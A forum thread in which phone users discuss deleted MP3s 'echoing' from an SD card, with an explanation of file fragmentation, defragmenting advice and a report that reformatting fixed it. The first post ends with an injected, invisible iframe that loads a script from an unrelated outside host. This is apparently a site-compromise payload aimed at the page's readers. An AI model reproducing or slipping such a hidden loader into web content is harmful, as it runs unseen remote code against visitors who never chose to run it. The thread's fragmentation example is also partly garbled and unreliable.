+ Reply to Thread

Thread: MP3 song echoes

MP3 song echoes

Has anyone else experienced this problem? I'm listening to my MP3's, and then all of the sudden I'll hear an "echo" from a song that I used to have but have since deleted. Usually, they are only a couple of seconds, but they've gotten longer recently, which makes them more distracting. I'm using a Cruzer to add and delete songs from my sd card (usually an album at a time), so I figure that has something to do with it. I'm guessing the solution is to reformat my card, but I was wondering if anyone else had run into this too.

I'm also using the trick (that I learned here--but let's face it, what about this phone DIDN'T I learn here?) of having several album folders on my SD card, and then renaming one of them to "AUDIO" when I want to listen to it (each of the folders has its own playlist file, so all the songs are in the right order when I want to listen to them). So far, it's been working great, except for this problem with the echoes...

Thanks for any help or input! Did I mention I love this phone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You might try just defragmenting the card after putting new files on it. This will keep all the bits & bytes for each file together so the player doesnt have to search around for em.

Let me explain what fragmentation is so everyone understands why DEfragmentation is important.

Lets assume you store three files (1,2,3) in a sequence:

Each file is composed of several clusters, in the above example file 1 has three clusters, file 2 has two clusters and file 3 has five.
    (most files have way more than 3-5 clusters but for this example i've simplified it)

Lets say you delete file 2:

111xx33333

Now you add file 4 (4444) which is a four cluster file:

What happend? File 4 filled in the empty spots first and because it was larger than file 2 used to be it moved the remaining part of file 4 to the end of the disk.

So why does the player get confused? I'm guessing that when/if you delete file 3, it stil has to proccess the space in bewteen the two sections of file 44 and it gets messed up & starts to play part of the old file 3 (when files are deleted they are still on the disk, however their pointer is erased, kinda like using whiteout on a chapter name in the table of contents. they don't really get erased until another file is written over them)

11144xxxxx44

So if you defragment the disk, it will assemble the "fragmented" files together for easier/faster processing.

I haven't had any expierence defragmenting SD cards, but I assume its just like a harddrive. to defragment in Windows, open my computer and right click on the desired drive. Choose properties and then select the Tools tab. The last botton at the bottom is for defragmentation.

Hope this helps.
    iPhone therefore iAm.

Steve--

Thanks for the suggestion and VERY helpful explanation. I defragment my computer all the time, but never quite knew exactly what it did. :dunno Now I do.

Anyway, I'll try and defragment the card when I get home and let you know if it works. I MUCH prefer your solution to reformatting the card altogether, since then I would have to reinstall everything (photos, docs, backup programs) back on the card.

Thanks again!

I posted about this same issue just yesterday in "SD Card Trouble".

You're welcome bloom51, I hope it works.

Jazmaan -- Did defragmenting work for you?
    iPhone therefore iAm.

Yes although it didn't occur to me to just use the Windows defrag tool. I actually reformatted my SD card and did an en masse file transfer of all my MP3's in one pass. Same result in a roundabout way. But yes, I haven't had any more "echoes" of deleted songs or any other MP3 skipping issues since. :>

Jazmaan -- Sorry I missed your post. I actually read through that thread looking if anyone had mentioned this, but it must have been just before you posted...

Anyway, I ended up reformatting my card after all. The defragmenting did work at first, but things were still a little buggy so I decided to start over with a clean slate. I have a feeling my card may have been a little too far gone with all the copying and deleting that I've been doing. Maybe the lesson is to defragment earlier and more often?

No problems with "echoes" now.

Good to hear all is well now bloom51.

FYI, You can defrag more than once if the first one didn't do the job, shouldn't matter with the small sizes if SD cards though. Back in the old days (98 & winNT) I would set the Defrag to run 3-4 times or sometimes continously, I don't think newer OS's give you those options now so you'd have to re-run it manually.

As far as earlier and more ofton....Normally I'd say yes it never hurts to defrag, however I believe SD cards have a shorter lifespan than normal harddrives. I thought I read somewhere that they only have 100,000 Read/Write cycles in them. This will probably last a long time but I gotta believe that if they do have a limited lifespan, defragmentation is only adding nails into the coffin faster.
    iPhone therefore iAm.

The heck with all that, lets get someone to develop a 3rd party MP3 player that is sortable by ID3 tags!!!!

I second that motion HotSynC! OR at least a method to make multiple customizable playlists to work seamlessly with the standard player.
    iPhone therefore iAm.